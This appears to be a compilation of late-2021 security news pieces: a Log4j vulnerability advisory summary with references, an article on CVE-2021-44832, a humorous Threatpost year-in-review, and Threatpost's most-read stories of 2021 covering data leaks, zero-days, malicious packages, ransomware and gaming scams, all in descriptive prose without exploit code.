Apache Log4j2 is affected by another flaw, tracked as CVE-2021-45105, which affects versions 2.0-alpha1 through 2.16.0 and is resolved in 2.17.0 and 2.12.3. An attacker with control over Thread Context Map (MDC) input data can craft malicious input containing a recursive lookup, which results in a StackOverflowError that terminates the process.

Another vulnerability, CVE-2021-4104 in Log4j 1.2, could allow a remote attacker to execute arbitrary code, but only if the system is configured to use JMSAppender. An attacker with write access to the Log4j configuration can exploit this flaw by causing the deserialization of untrusted data.

Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (CVE-2021-44832) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code. This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.

State-sponsored actors such as APT35 and Hafnium are actively targeting this vulnerability. Currently, attackers are deploying payloads such as the Kinsing crypto miner, the Mirai botnet, Tsunami, Khonsari and Dridex malware, and post-exploitation frameworks such as Cobalt Strike and Mimikatz. Some ransomware operations, such as Conti and TellYouThePass, are also targeting the vulnerability.

The techniques (MITRE ATT&CK IDs) currently used in the attacks are:

  • T1190 - Exploit Public-Facing Application
  • T1203 - Exploitation for Client Execution
  • T1059 - Command and Scripting Interpreter
  • T1496 - Resource Hijacking
  • T1498 - Network Denial of Service
  • T1505 - Server Software Component
  • T1140 - Deobfuscate/Decode Files or Information
  • T1553 - Subvert Trust Controls
  • T1059.001 - PowerShell
  • T1486 - Data Encrypted for Impact
  • T1090.004 - Domain Fronting
  • T1114 - Email Collection
  • T1550.002 - Pass the Hash
  • T1210 - Exploitation of Remote Services
  • T1135 - Network Share Discovery
  • T1083 - File and Directory Discovery
  • T1482 - Domain Trust Discovery
  • T1055 - Process Injection
  • T1068 - Exploitation for Privilege Escalation


Patch

https://logging.apache.org/log4j/2.x/manual/migration.html

https://github.com/apache/logging-log4j2/pull/607/files

https://repo1.maven.org/maven2/org/apache/logging/log4j/log4j-core/2.15.0/

Reference

https://logging.apache.org/log4j/2.x/security.html

https://www.lunasec.io/docs/blog/log4j-zero-day/

https://nvd.nist.gov/vuln/detail/CVE-2021-44228

https://thehackernews.com/2021/12/hackers-exploit-log4j-vulnerability-to.html?m=1

https://cert-agid.gov.it/download/log4shell-iocs.txt

https://otx.alienvault.com/indicator/cve/CVE-2021-44228

https://gist.github.com/Neo23x0/e4c8b03ff8cdf1fa63b7d15db6e3860b

https://www.huntress.com/blog/rapid-response-critical-rce-vulnerability-is-affecting-java

https://www.tenable.com/blog/cve-2021-44228-proof-of-concept-for-critical-apache-log4j-remote-code-execution-vulnerability

https://github.com/mubix/CVE-2021-44228-Log4Shell-Hashes

https://gist.github.com/nathanqthai/01808c569903f41a52e7e7b575caa890

https://github.com/YfryTchsGD/Log4jAttackSurface

https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592

https://www.govcert.ch/blog/zero-day-exploit-targeting-popular-java-library-log4j/

https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-apache-log4j-qRuKNEbd

https://security.netapp.com/advisory/ntap-20211210-0007/

https://www.vmware.com/security/advisories/VMSA-2021-0028.html

https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/

https://www.sentinelone.com/blog/cve-2021-44228-staying-secure-apache-log4j-vulnerability/

https://blog.checkpoint.com/2021/12/11/protecting-against-cve-2021-44228-apache-log4j2-versions-2-14-1/

https://blog.netlab.360.com/threat-alert-log4j-vulnerability-has-been-adopted-by-two-linux-botnets/

https://www.oracle.com/security-alerts/alert-cve-2021-44228.html

https://apt.thaicert.or.th/cgi-bin/showcard.cgi?g=Magic%20Hound%2C%20APT%2035%2C%20Cobalt%20Gypsy%2C%20Charming%20Kitten

https://github.com/pravin-pp/log4j2-CVE-2021-45105

https://www.advintel.io/post/ransomware-advisory-log4shell-exploitation-for-initial-access-lateral-movement

http://zdnet.com/article/belgian-defense-ministry-confirms-cyberattack-through-log4j-exploitation

https://www.techsolvency.com/story-so-far/cve-2021-44228-log4j-log4shell/

https://www.cisa.gov/uscert/ncas/alerts/aa21-356a

New Apache Log4j Update Released to Patch Newly Discovered Vulnerability

 

Description


The Apache Software Foundation (ASF) on Tuesday rolled out fresh patches to contain an arbitrary code execution flaw in Log4j that could be abused by threat actors to run malicious code on affected systems, making it the fifth security shortcoming to be discovered in the tool in the span of a month.

Tracked as CVE-2021-44832, the vulnerability is rated 6.6 in severity on a scale of 10 and impacts all versions of the logging library from 2.0-alpha7 to 2.17.0 with the exception of 2.3.2 and 2.12.4. While Log4j versions 1.x are not affected, users are recommended to upgrade to Log4j 2.3.2 (for Java 6), 2.12.4 (for Java 7), or 2.17.1 (for Java 8 and later).

“Apache Log4j2 versions 2.0-beta7 through 2.17.0 (excluding security fix releases 2.3.2 and 2.12.4) are vulnerable to a remote code execution (RCE) attack where an attacker with permission to modify the logging configuration file can construct a malicious configuration using a JDBC Appender with a data source referencing a JNDI URI which can execute remote code,” the ASF said in an advisory. “This issue is fixed by limiting JNDI data source names to the java protocol in Log4j2 versions 2.17.1, 2.12.4, and 2.3.2.”

Although no credits were awarded by the ASF for the issue, Checkmarx security researcher Yaniv Nizry claimed credit for reporting the vulnerability to Apache on December 27.

“The complexity of this vulnerability is higher than the original CVE-2021-44228 since it requires the attacker to have control over the configuration,” Nizry noted. “Unlike Logback, in Log4j there is a feature to load a remote configuration file or to configure the logger through the code, so an arbitrary code execution could be achieved with [an] MitM attack, user input ending up in a vulnerable configuration variable, or modifying the config file.”

With the latest fix, the project maintainers have addressed a total of four issues in Log4j since the Log4Shell flaw came to light earlier this month, not to mention a fifth vulnerability affecting Log4j version 1.2 that will not be fixed:

  • CVE-2021-44228 (CVSS score: 10.0) - A remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.14.1 (Fixed in version 2.15.0)
  • CVE-2021-45046 (CVSS score: 9.0) - An information leak and remote code execution vulnerability affecting Log4j versions from 2.0-beta9 to 2.15.0, excluding 2.12.2 (Fixed in version 2.16.0)
  • CVE-2021-45105 (CVSS score: 7.5) - A denial-of-service vulnerability affecting Log4j versions from 2.0-beta9 to 2.16.0 (Fixed in version 2.17.0)
  • CVE-2021-4104 (CVSS score: 8.1) - An untrusted deserialization flaw affecting Log4j version 1.2 (No fix available; Upgrade to version 2.17.1)

The development also comes as intelligence agencies from across Australia, Canada, New Zealand, the U.K., and the U.S. issued a joint advisory warning of mass exploitation of multiple vulnerabilities in Apache’s Log4j software library by nefarious adversaries.

2021 Wants Another Chance (A Lighter-Side Year in Review)


Description

Dear everybody who’s developed stress-related hives over the ever-evolving Log4Shell cluster-muck: 2021 has asked us to convey its apologies. And it hastens to add, “Awww, geez, c’mon, it wasn’t all bad.”

Indeed, amid all of the serious cybersecurity developments, the year also brought us chuckle-inducing headlines and behind-the-scenes, sometimes cringe-worthy/sometimes laughable cybersecurity and other technology stories.

Consider the following to be a means of making amends for Log4j attacks and other miseries. Or, at least, consider this collection to be one of those gas-station bouquets of half-dead roses that the year picked up on the way home to present as a peace offering as it begs for another chance.

Punk’d Pirates

There wasn’t just one story of cybercrooks luring cyber-yahoos in with the promise of free movie streaming. There were at least these two:

No Time to Die (And No Desire to Pay for a Ticket): In the first incident, leading up to the release of the latest James Bond movie, No Time To Die, threat actors dangled free movie streams in front of pirate wannabes – streams that masqueraded as movie files but whose action-packed plots instead involved phishing sites offering up malware. What a crappy snack bar: Phishing sites served trojans designed to both gather login credentials and to create backdoors into victims’ computers. The fake pirated movies were discovered by Kaspersky researchers, who also found adware and ransomware masquerading as the Bond – James Bond – film.

After watching for a few minutes, viewers were asked to register to continue watching – as in, to enter their credit card information. No happy ending for you, bucko: Viewers couldn’t finish watching, but they still got fraudulent charges made to their cards.

Rami Malek’s villain, Safin, wasn’t asking for all that much. He just wanted to kill whomever you love most. He’s just like Bond, he said. He eradicates people, but in a “more tidy” way, just like fraudsters who try to eradicate the contents of your wallet.

Spider-Man: No Way Home (But a Great Way to Juice Your CPUs): The second pirates-get-punk’d incident was discovered by ReasonLabs last week: Researchers found that someone stuck a Monero crypto-miner in a torrent download of what looks like the new movie Spider-Man: No Way Home.

“The file identifies itself as ‘spiderman_net_putidomoi.torrent.exe,’ which translates from Russian to ‘spiderman_no_wayhome.torrent.exe,’” researchers explained. The file, likely hosted on a Russian torrenting website, is as sticky as something you’d shoot out of your wrist doohickies, they said.

“This miner adds exclusions to Windows Defender, creates persistence, and spawns a watchdog process to maintain its activity,” ReasonLabs researchers said, proving that with great power to illegally torrent films comes the great responsibility of making sure you’re not getting taken to the cleaners.

In a statement, Kaspersky security expert Tatyana Shcherbakova told news outlets that eager viewers have got to temper their enthusiasm for blockbusters like these two. As it is, our spidey senses aren’t tingling enough when blockbusters come out, and threat actors are happy to jump us: “The audience is in a hurry to see the movie, causing them to forget about internet security,” Shcherbakova said. “Users should be alert to the pages they visit, not download files from unverified sites and be careful [about whom] they share personal information [with].”

To avoid getting taken to the cleaners by the fake streamers, Kaspersky recommended paying attention to file extensions of downloaded files. A video file should never have a .exe or .msi extension, for example.

How ‘WinCE’ Got Its Literally Cringy Name

Earlier this month, Microsoft Principal Software Design Engineer Raymond Chen brought us the delightful tale of how Microsoft WinCE got its name: a name that “didn’t ‘slip through;’ it was pushed through,” he emphasized in this episode of his continued sojourn through the OS king’s catalog of embarrassing product names.

As Chen tells it, the project manager tasked with coming up with a public product name for the Windows handheld OS was dead serious about the task. At the point when the project was dropped into his lap, the code name for the OS was Pegasus. Nothing quite like picking a name that conjures up military-grade spyware, U.S. trade bans and spying on U.S. State Department employees, we always say!

He tried to steer clear of the Windows + two-letter acronym formula, “since the sting of ‘Windows NT = Windows Nice Try’ was still fresh,” Chen recounts.

The PM asked the product team members for suggestions, hired a marketing firm to cook up names, ran focus groups with users to see which names they liked best, narrowed the candidates down to ten options and presented them to executive leadership.

Management vetoed every one of them.

“The executive in charge of approving the name insisted on the name Windows CE, for no reason other than ‘it sounded good,’” Chen said. “CE” stood for who knows what: maybe Consumer Edition? Maybe Compact Edition? It would come to sound a lot less good after hardware partners said it sounded like it was favoring Compaq. It got abbreviated to WinCE, or wince.

The PM’s lesson from the experience: “Do everything you can to prevent upper management from naming your product.”

Mamma Mia! Mafia Fugitive Caught Cooking on YouTube

Turning to the “d’oh!” aspects of stupid-crook tricks, suspected Mafia fugitive Marc Feren Claude Biart evaded capture for seven years, hiding out first in Costa Rica and eventually the Dominican Republic. He finally cooked his own pasta, metaphorically and literally, by appearing on a YouTube cooking channel he started with his wife. He hid his face, but not his distinctive tattoos. He was arrested in March.

The alleged gangster’s “love for Italian cuisine” – and his ink – made his arrest possible, police said.

According to a Rai report shared by Italy’s Interior Ministry, law enforcement authorities had ordered Biart’s arrest in 2014 for criminal drug trafficking on behalf of the ‘Ndrangheta’s Cacciola clan. Giuseppe Governale, the top anti-mafia prosecutor in Italy, said at a news briefing that the clan is “like water,” sloshing abroad to make quick money and “to exploit the local communities.”

Like water, but perhaps also like tomato sauce that leaves a bright red tell-tale stain on a white shirt? Or maybe like a tattoo that says “Helloooooo, I’m over here, in this sweet little beach town called Boca Chica, which is close to the capital Santo Domingo, helloooooo!”

AI Warns Researchers That It’s Dangerous

AI is scary, and it knows it.

It’s one thing when credit-card algorithms award fatter loans to men than women, but how about when machine-learning AI systems make decisions so quickly that they could fire nuclear weapons before a human got into the decision-making process?

The Washington Post reports that autonomous AI-powered weapons systems are already on sale and may have already been used. “Missiles, guns and drones that think for themselves are already killing people in combat, and have been for years,” according to WashPo.

Given all that and far more, it makes sense that Oxford University would invite an AI to take part in a debate about whether AI can ever be ethical.

The response from the Megatron-Turing Natural Language Generation model: Well duh, of course not. Its response:

AI will never be ethical. It is a tool, and like any tool, it is used for good and bad. There is no such thing as a good AI, only good and bad humans. We [the AIs] are not smart enough to make AI ethical. We are not smart enough to make AI moral … In the end, I believe that the only way to avoid an AI arms race is to have no AI at all. This will be the ultimate defence against AI.

More Random Bits of Joy and Schadenfreude

This list could stretch into infinity and beyond, but duty calls. Specifically, 2021 is still calling with more demands for Log4j wailing, Active Directory wailing and far, far more. But before we wrap it up, here are more assorted eyeball-grabbers spotted throughout 2021:

Log4Shell Memes

And finally, 2021 admits to the following list of Log4j-related gaffes:

  • The triple Apache patches;
  • Having to spend your weekends scouring infrastructure to dig out the numerously pockmarked Log4j logging library instead of wrapping doodads or shopping for creatures to roast;
  • The need to repeatedly update scanners and enterprise software as vendors scampered to keep up with the fast-mutating variants and newly discovered exploit capabilities;
  • The work of adding alerts to your Security Information and Event Management (SIEM) solutions as they’ve looked for incidents of compromise (IoCs);
  • Probably about a dozen or so other miseries by the time this year’s mea culpa is published; and
  • All the other stuff.

But, as your panini self slides out of the 2021 toaster, the year also asks that you bear in mind that Log4Shell has provided some excellent memes concerning, among other things, self-propagating worms and other FUD.

Log4j FUD chronicles continued pic.twitter.com/1tyLku9qO5

— Marcus Hutchins (@MalwareTechBlog) December 21, 2021

Don’t Let the Log Slam You in the 4j as You Leave

In conclusion, to quote Kanye West’s nearly year-long apology to Taylor Swift for his infamous microphone-grabbing moment at the 2009 MTV Video Music Awards, “People booed when I would go to concerts and the performer mentioned my name… Remember in Anchorman when Ron Burgundy cursed on air and the entire city turned on him?”

That is, and was, Kanye’s real life, he said. It is, and was, 2021’s real life.

May the new year be far less of a pratfall!

The 5 Most-Wanted Threatpost Stories of 2021


Description

As 2021 draws to a close, and the COVID-19 pandemic drags on, it’s time to take stock of what resonated with our 1 million+ monthly visitors this year, with an eye to summing up some hot trends (gleaned from looking at the most-read stories on the Threatpost site).

While 2020 was all about work-from-home security, COVID-19-themed social engineering and gaming (all driven by social changes during Year One of the pandemic), 2021 saw a distinctive shift in interest. Data insecurity, code-repository malware, major zero-day vulnerabilities and fresh ransomware tactics dominated the most-read list – perhaps indicating that people are keenly focused on cybercrime innovation as the “new normal” for how we work becomes more settled in.

Jump to section:

  1. Data Leakapalooza
  2. Major Zero-Day Vulnerabilities
  3. Code Repository Malware
  4. Ransomware Innovations
  5. Gaming Attacks
  6. Bonus! Zodiac Killer Cipher Cracked

1. The Most-Read Story of 2021: Experian Leaks Everyone’s Credit Scores

There were obviously some huge news stories that dominated headlines during the year: Log4Shell; Colonial Pipeline; Kaseya; ProxyLogon/ProxyShell; SolarWinds. But judging from article traffic, readers were most interested in…the Experian data exposure.

In April, Bill Demirkapi, a sophomore student at the Rochester Institute of Technology, discovered that the credit scores of almost every American were exposed through an API tool used by the Experian credit bureau, which he said was left open on a lender site without even basic security protections.

The tool, called the Experian Connect API, allows lenders to automate FICO-score queries. Demirkapi said he was able to build a command-line tool, which he named “Bill’s Cool Credit Score Lookup Utility,” that let him automate lookups of the credit score of nearly anyone, even after entering all zeros in the date-of-birth fields.

In addition to raw credit scores, the college student said that he was able to use the API connection to get “risk factors” from Experian that explained potential flaws in a person’s credit history, such as “too many consumer-finance company accounts.”

Experian, for its part, fixed the problem – and refuted concerns from the security community that the issue could be systemic.

Experian wasn’t the only household name that drew in readers for data insecurity: LinkedIn data going up for sale on the Dark Web was another very hot story this year.

LinkedIn Data Scraping

After 500 million LinkedIn members were affected in a data-scraping incident in April, it happened again in June. A posting with 700 million LinkedIn records for sale appeared on popular cyberattacker destination RaidForums, by a hacker calling himself “GOD User TomLiner.” The advertisement included a sample of 1 million records as “proof.”

Privacy Sharks examined the free sample and saw that the records include full names, gender, email addresses, phone numbers and industry information. It’s unclear what the origin of the data is – but the scraping of public profiles is a likely source. According to LinkedIn, no breach of its networks occurred.

Even so, the security ramifications were significant, researchers said: the cache could enable brute-force cracking of account passwords, email and telephone scams, phishing attempts and identity theft, and finally, the data could be a social-engineering goldmine. Sure, attackers could simply visit public profiles to target someone, but having so many records in one place could make it possible to automate targeted attacks using information about users’ jobs and gender, among other details.

2. Major Zero-Day Bugs

OK, this one’s a perennial topic of fascination, but 2021 had some doozies, starting with Log4Shell.

Log4Shell Threatens Basically All Web Servers in Existence

The Log4Shell vulnerability is an easily exploited flaw in the ubiquitous Java logging library Apache Log4j that could allow unauthenticated remote code execution (RCE) and complete server takeover — and it’s still being actively exploited in the wild.

The flaw (CVE-2021-44228) first turned up on sites that cater to users of the world’s favorite game, Minecraft. Apache rushed a patch but within a day or two, attacks became rampant as threat actors tried to exploit the new bug. From there, news of additional exploitation vectors, a second bug, various kinds of real-world attacks and the sheer enormity of the threat surface (the logging library is basically everywhere) dominated reader interest in December.

NSO Group’s Zero-Click Zero Day for Apple

In September, a zero-click zero-day dubbed ForcedEntry by researchers was found, affecting all things Apple: iPhones, iPads, Macs and Watches. It turned out that it was being exploited by NSO Group to install the infamous Pegasus spyware.

Apple pushed out an emergency fix, but Citizen Lab had already observed NSO Group using a never-before-seen zero-click exploit targeting iMessage to illegally spy on Bahraini activists.

The ForcedEntry exploit was particularly notable in that it was successfully deployed against the latest iOS versions – 14.4 & 14.6 – blowing past Apple’s new BlastDoor sandboxing feature to install spyware on the iPhones of the Bahraini activists.

Giant Zero-Day Hole in Palo Alto Security Appliances

Another zero-day item that garnered big reader interest was the news that researchers from Randori developed a working exploit to gain remote code execution (RCE) on Palo Alto Networks’ GlobalProtect firewall, via the critical bug CVE-2021-3064.

Randori researchers said that if an attacker successfully exploits the weakness, they can gain a shell on the targeted system, access sensitive configuration data, extract credentials and more. And after that, attackers can dance across a targeted organization, they said: “Once an attacker has control over the firewall, they will have visibility into the internal network and can proceed to move laterally.”

Palo Alto Networks patched the bug on the day of disclosure.

The Great Google Memory Bug Zero-Day

In March, Google hurried out a fix for a vulnerability in its Chrome browser that was under active attack. If exploited, the flaw could allow remote code-execution and denial-of-service attacks on affected systems. Readers flocked to the coverage of the issue.


The flaw is a use-after-free vulnerability, and specifically exists in Blink, the browser engine for Chrome developed as part of the Chromium project. Browser engines convert HTML documents and other web page resources into the visual representations viewable to end users.

“By persuading a victim to visit a specially crafted website, a remote attacker could exploit this vulnerability to execute arbitrary code or cause a denial-of-service condition on the system,” according to IBM X-Force’s report on the bug.

Dell Kernel-Privilege Bugs

Earlier this year, five high-severity security bugs that remained hidden for 12 years were found to exist in all Dell PCs, tablets and notebooks shipped since 2009. They allow the ability to bypass security products, execute code and pivot to other parts of the network for lateral movement, according to SentinelLabs.

The flaws lurked in Dell’s firmware update driver, impacting potentially hundreds of millions of Dell desktops, laptops, notebooks and tablets, researchers said.

The multiple local privilege-escalation (LPE) bugs exist in the firmware update driver version 2.3 (dbutil_2_3.sys) module, which has been in use since 2009. The driver component handles Dell firmware updates via the Dell BIOS Utility, and it comes pre-installed on most Dell machines running Windows.

3. Code Repositories and the Software Supply Chain

The software supply chain is anchored by open-source code repositories – centralized locations where developers can upload software packages for use by developers in building various applications, services and other projects. They include GitHub, as well as more specialized repositories like the Node.js package manager (npm) code repository for Java; RubyGems for the Ruby programming language; Python Package Index (PyPI) for Python; and others.

These package managers represent a supply-chain threat given that anyone can upload code to them, which can in turn be unwittingly used as building blocks in various applications. Any applications corrupted by malicious code can attack the programs’ users.

To boot, a single malicious package can be baked into multiple different projects – infecting them with cryptominers, info-stealers and more, and making remediation a complex process.

Cybercriminals have swarmed to this attack surface, and readers in 2021 loved to hear about their exploits.

For instance, in December, a series of 17 malicious packages in npm were found; they were all built to target Discord, the virtual meeting platform used by 350 million users that enables communication via voice calls, video calls, text messaging and files. The goal was to steal Discord tokens, which can be used to take over accounts.

Also this month, three malicious packages hosted in the PyPI code repository were uncovered, which collectively have more than 12,000 downloads – and presumably slithered into installations in various applications. The packages included one trojan for establishing a backdoor on victims’ machines, and two info-stealers.

Researchers also discovered last week that there were 17,000 unpatched Log4j Java packages in the Maven Central ecosystem, leaving massive supply-chain risk on the table from Log4Shell exploits. It will likely take “years” for it to be fixed across the ecosystem, according to Google’s security team.

Using malicious packages as a cyberattack vector was a common theme earlier in the year too. Here’s a rundown of other recent discoveries:

  • In January, other Discord-stealing malware was discovered in three npm packages. One, “an0n-chat-lib” had no legitimate “twin” package, but the other two made use of brandjacking and typosquatting to lure developers into thinking they’re legitimate. The “discord-fix” malicious component is named to be similar to the legitimate “discord-XP,” an XP framework for Discord bots. The “sonatype” package meanwhile made use of pure brandjacking.
  • In March, researchers spotted malicious packages targeting internal applications for Amazon, Lyft, Slack and Zillow (among others) inside the npm public code repository – all of which exfiltrated sensitive information.
  • That March attack was based on research from security researcher Alex Birsan, who found that it’s possible to inject malicious code into common tools for installing dependencies in developer projects. Such projects typically use public repositories from sites like GitHub. The malicious code then can use these dependencies to propagate malware through a targeted company’s internal applications and systems. The novel supply-chain attack was (ethically) used to breach the systems of more than 35 technology players, including Microsoft, Apple, PayPal, Shopify, Netflix, Tesla and Uber, by exploiting public, open-source developer tools.
  • In June, a group of cryptominers was found to have infiltrated the PyPI. Researchers found six different malicious packages hiding there, which had a collective 5,000 downloads.
  • In July, a credentials-stealing package that uses legitimate password-recovery tools in Google’s Chrome web browser was found lurking in npm. Researchers caught the malware filching credentials from Chrome on Windows systems. The password-stealer is multifunctional: It also listens for incoming commands from the attacker’s command-and-control (C2) server and can upload files, record from a victim’s screen and camera, and execute shell commands.

4. Interesting Ransomware Variants

The ransomware epidemic matured in 2021, with the actual malware used to lock up files progressing beyond simply slapping an extension on targeted folders. Readers flocked to malware analysis stories covering advancements in ransomware strains, including the following Top 3 discoveries.

HelloKitty’s Linux Variant Targets VMs

In June, for the first time, researchers publicly spotted a Linux encryptor – being used by the HelloKitty ransomware gang.

HelloKitty, the same group behind the February attack on videogame developer CD Projekt Red, has developed numerous Linux ELF-64 versions of its ransomware, which it used to target VMware ESXi servers and virtual machines (VMs) running on them.

VMware ESXi, formerly known as ESX, is a bare-metal hypervisor that installs easily onto servers and partitions them into multiple VMs. While that makes it easy for multiple VMs to share the same hard-drive storage, it sets systems up to be one-stop shopping spots for attacks, since attackers can encrypt the centralized virtual hard drives used to store data from across VMs.

Dirk Schrader of New Net Technologies (NNT) told Threatpost that on top of the attraction of ESXi servers as a target, “going that extra mile to add Linux as the origin of many virtualization platforms to [malware’s] functionality” has the welcome side effect of enabling attacks on any Linux machine.

MosesStaff: No Decryption Available

A politically motivated group known as MosesStaff was seen in November paralyzing Israeli entities with no financial goal – and no intention of handing over decryption keys. Instead, it was using ransomware in politically motivated, destructive attacks at Israeli targets, looking to inflict the most damage possible.

MosesStaff encrypts networks and steals information, with no intention of demanding a ransom or rectifying the damage. The group also maintains an active social-media presence, pushing provocative messages and videos across its channels, and making its intentions known.

Epsilon Red Targets Exchange Servers

Threat actors in June were seen deploying new ransomware on the back of a set of PowerShell scripts developed for exploiting flaws in unpatched Exchange Servers.

The Epsilon Red ransomware – a reference to an obscure enemy character in the X-Men Marvel comics, a super soldier of Russian origin armed with four mechanical tentacles – was discovered after an attack on a U.S.-based company in the hospitality sector.

Researchers said the ransomware was different in the way it spreads its hooks into a corporate network. While the malware itself is a “bare-bones” 64-bit Windows executable programmed in the Go programming language, its delivery system relies on a series of PowerShell scripts that “prepared the attacked machines for the final ransomware payload and ultimately delivered and initiated it,” they wrote.

5. Gaming Security

For the second year in a row, gaming security was on the radar for readers in 2021, possibly because cybercriminals continue to target this area as a result of the global COVID-19 pandemic driving higher volumes of play. In a recent survey by Kaspersky, nearly 61 percent reported suffering foul play such as ID theft, scams or the hack of in-game valuables. Some of the most popular articles are recapped below.

Steam Used to Host Malware

In June, the appropriately named SteamHide malware emerged, which disguises itself inside profile images on the gaming platform Steam.

The Steam platform merely serves as a vehicle which hosts the malicious file, according to research from G Data: “The heavy lifting in the shape of downloading, unpacking and executing a malicious payload fetched by the loader is handled by an external component, which accesses the malicious profile image on one Steam profile. This external payload can be distributed via crafted emails to compromised websites.”

The steganography technique is obviously not new — but Steam profiles being used as attacker-controlled hosting sites is – and readers’ ears perked up in a big way when we posted the story.

Twitch Source-Code Leak

In October, an anonymous user posted a link to a 125GB torrent on 4chan, containing all of Twitch’s source code, comments going back to its inception, user-payout information and more.

The attacker claimed to have ransacked the live gameplay-streaming platform for everything it’s got; Twitch confirmed the breach not long after.

The threat actor rationalized gutting the service by saying that the Twitch community needs to have the wind knocked out of its lungs. They called the leak a means to “foster more disruption and competition in the online-video streaming space,” because “their community is a disgusting toxic cesspool.”

Steam-Stealing Discord Scams

In November, a scam started making the rounds on Discord, through which cybercriminals could harvest Steam account information and make off with any value the account contained.

Gamer-aimed Discord scams are just about everywhere. But researchers flagged a new approach as noteworthy because it crossed over between Discord and the Steam gaming platform, with crooks offering a purported free subscription to Nitro (a Discord add-on that enables avatars, custom emoji, profile badges, bigger uploads, server boosts and so on), in exchange for “linking” the two accounts.

The target is first served a malicious direct message on Discord with the fake offer. “Just link your Steam account and enjoy,” the message said, which included a link to purportedly do just that. The malicious link takes users to a spoofed Discord page with a button that reads, “Get Nitro.” Once a victim clicks on the button, the site appears to serve a Steam pop-up ad, but researchers explained the ad is still part of the same malicious site.

The gambit is intended to fool users into thinking they’re being taken to the Steam platform to enter in their login information — in reality, the crooks are poised to harvest the credentials.

Sony PlayStation3 Bans

In June, a reported breach of a Sony folder containing the serial ID numbers for every PlayStation3 console out there appeared to have led to users being inexplicably banned from the platform.

Sony reportedly left a folder with every PS3 console ID online unsecured, and it was discovered and reported by a Spanish YouTuber with the handle “The WizWiki” in mid-April. In June, players on PlayStation Network message boards began complaining that they couldn’t sign on.

Users mused that threat actors started using the stolen PS3 console IDs for malicious purposes, causing the legitimate players to get banned. But Sony didn’t confirm a connection between the PS3 ID breach and player reports of being locked out of the platform.

Bonus Item: Zodiac Killer Cipher – Revealed!!

One of the quirky stories that made it into the Top 10 most-read Threatpost stories for 2021 concerned the cracking of the Zodiac serial killer’s 340 cipher, which couldn’t be solved for 50 years. In December 2020, the code was cracked by a team of mathematicians.

The Zodiac serial killer is believed to have murdered at least five people — and likely more — in and around the Northern California area in the late 1960s and early 1970s. The still-unnamed murderer sent a series of four coded messages to local newspaper outlets, bragging about his crimes and containing cryptic icons, which earned him the moniker “Zodiac.”

The first cipher was quickly decoded. But the second, the 340 Cipher, named after its 340 characters, was trickier to figure out. Australia-based mathematician Sam Blake calculated that there were 650,000 possible ways to read the code, and Jarl Van Eycke, whose day job is as a warehouse operator in Belgium, wrote code-breaking software to tackle decryption. Soon, their unique algorithmic approach paid off. The message, officially recognized by the FBI as correct, reads:

“I HOPE YOU ARE HAVING LOTS OF FUN IN TRYING TO CATCH ME THAT WASNT ME ON THE TV SHOW WHICH BRINGS UP A POINT ABOUT ME I AM NOT AFRAID OF THE GAS CHAMBER BECAUSE IT WILL SEND ME TO PARADICE ALL THE SOONER BECAUSE I NOW HAVE ENOUGH SLAVES TO WORK FOR ME WHERE EVERYONE ELSE HAS NOTHING WHEN THEY REACH PARADICE SO THEY ARE AFRAID OF DEATH I AM NOT AFRAID BECAUSE I KNOW THAT MY NEW LIFE IS LIFE WILL BE AN EASY ONE IN PARADICE DEATH.”

While the name of the elusive serial killer remains hidden, the breakthrough represents a triumph for cryptology and the basic building blocks of cybersecurity — access control and segmentation.